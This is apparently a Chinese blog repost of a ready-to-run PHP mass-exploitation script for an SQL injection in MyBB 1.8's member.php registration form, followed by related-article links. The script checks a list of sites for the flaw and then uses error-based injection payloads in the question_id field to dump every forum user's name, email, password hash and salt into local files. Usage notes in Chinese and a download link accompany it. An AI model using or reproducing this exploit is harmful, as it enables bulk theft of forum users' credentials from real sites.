MyBB 18 SQL Injection Vulnerability

<?php error_reporting(0); ?>
<form method="post" action="">
Input a Url(for example:http://myskins.org/18/) : <br><textarea name="siteler" cols="35" rows="7"></textarea><br><br>
<input type="submit" value="Get it!">
</form>
<?php
ob_start();
set_time_limit(0);
if(!file_exists("dumpsss")) mkdir("dumpsss");
if(! $_POST['siteler']==""){ $siteler = explode("\n",$_POST['siteler']);
foreach($siteler as $sites){
$sites=trim($sites);
if(checkVulnerable($sites)) {
echo "[+] $sites Is Vulnerable!\n";
Inject($sites);
} else {
echo "[-] Target Is Not Vulnerable\n";
}
}
} else {
} function Inject($site) {
$get_website = parse_url($site);
$website = $get_website["host"];
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select count(*) from mybb_users LIMIT 0,1)f)x))-- -");
preg_match('!select \'(.*)\' AS!s', $html, $matches);
$count = $matches[1];
echo "[+] Count: $count\n"; for($i = 0; $i <= $count; $i++) {
if($count == 1) {
$num = "0,1";
} else {
$num = "$i,1";
}
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id=' or polygon((select*from(select*from(select concat(username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num)f)x))-- -");
preg_match('!select \'(.*)\' AS!s', $html, $matches);
if(isset($matches[1])) {
$split = explode(":", $matches[1]);
$username = $split[0];
$email = $split[1];
$password = $split[2];
$salt = $split[3];
echo "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n";
file_put_contents("dumpsss/$website.txt", "Username: $username\nEmail: $email\nPassword: $password\nSalt: $salt\n------\n", FILE_APPEND);
}
}
} function checkVulnerable($site) {
$ch = curl_init();
$html = HTTPPost("$site/member.php", "regcheck1=®check2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2®time=1416039333&step=registration&action=do_register®submit=Submit+Registration!&question_id='");
if(strpos($html, "You have an error in your SQL syntax")!==false) {
return true;
} else {
return false;
}
} function HTTPPost($site, $post) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/member.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_POSTFIELDS, $post);
$html = curl_exec($ch);
curl_close($ch);
return $html;
}
?>
另存为xxx.php 文件,然后在网页上执行,会在当前目录下生成dumpsss文件夹,如果存在漏洞,则会将网站会员导出到里面txt文件。
如果不存在漏洞,则会提示:[-] Target Is Not Vulnerable
代码在线查看\下载地址:https://ghostbin.com/paste/zs2mp
MyBB 18 SQL Injection Vulnerability的更多相关文章
- Cacti /graphs_new.php SQL Injection Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...
- FlarumChina SQL injection Vulnerability
First,We need to download our vulnerable program in GitHub links:https://github.com/skywalker512/Fla ...
- DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis
目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...
- Dede(织梦) CMS SQL Injection Vulnerability
测试方法: @Sebug.net dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...
- Zabbix 3.0.3 SQL Injection
Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...
- Portswigger web security academy:SQL injection
Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...
- SQL injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...
- CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...
- 数字雨Shopex 4.8.5 SQL Injection Exp
# -*- coding:utf-8 -* #Author:MXi4oyu #Email:798033502@qq.com #Shopex 4.8.5 SQL Injection Exp #转载请说明 ...
随机推荐
- bootstrap table分页后刷新跳到第一页
之前这样写是不行的,这时候页数还是原来的页数 $('#tb_departments').bootstrapTable(('refresh')); 需要改成: $("#tb_departmen ...
- 学习Java之前操作环境的安装及配置
1.根据自己的系统版本下载相应版本的JDK(Java开发运行时环境) 查看自己系统版本的方法:在桌面上右键计算机(win7,win10是此电脑,XP是我的电脑),点击属性,进入到计算机属性页面以后里面 ...
- hadoop集群搭建--CentOS部署Hadoop服务
在了解了Hadoop的相关知识后,接下来就是Hadoop环境的搭建,搭建Hadoop环境是正式学习大数据的开始,接下来就开始搭建环境!我们用到环境为:VMware 12+CentOS6.4 hadoo ...
- 关于Content-Type的问题
今天我在编写html表单提交到 php时,出现了一个很奇怪的现象. 为了让php文件的字符编码与html一致,我在php文件加了一句 header("Content-Type:html/te ...
- Lua调试:getinfo详解
getinfo是调试Lua程序时一个很重要很常见的函数,主要用于获取函数调用的基本信息.这个函数的难点在于各个参数的含义.下面一一介绍. 一.函数简介: 1.原型:getinfo(level, arg ...
- 计算机的启动和Linux的启动
计算机的启动和Linux的启动 一 计算机的启动 计算机的启动过程分为四个阶段,分别是:BIOS.MBR.启动管理程序.加载操作系统内核.操作系统启动. 1.1 BIOS 计算机加电后,第一件 ...
- Haoop基本操作
一.HDFS的常用操作 (一).HDFS文件的权限 与Linux文件权限类似 r: read; w:write; x:execute,权限x对于文件忽略,对于文件夹表示是否允许访问其内容. 如果Lin ...
- python中从文件中读取数据
# average5.py def main(): fileName = input("What file are the numbers in?") infile = open( ...
- [转载]PHP文件解压代码
来自开源中国:
- 小米红米1 android 4.4.4上操作数据库异常问题
产生的问题: 小米红米1 android 4.4.4上,按HOME键,应用进入后台,再启动,应用进程直接挂掉 解决的方法: 这个是操作数据库,数据库关闭之后导致的异常,解决的方法: //4.0以上的版 ...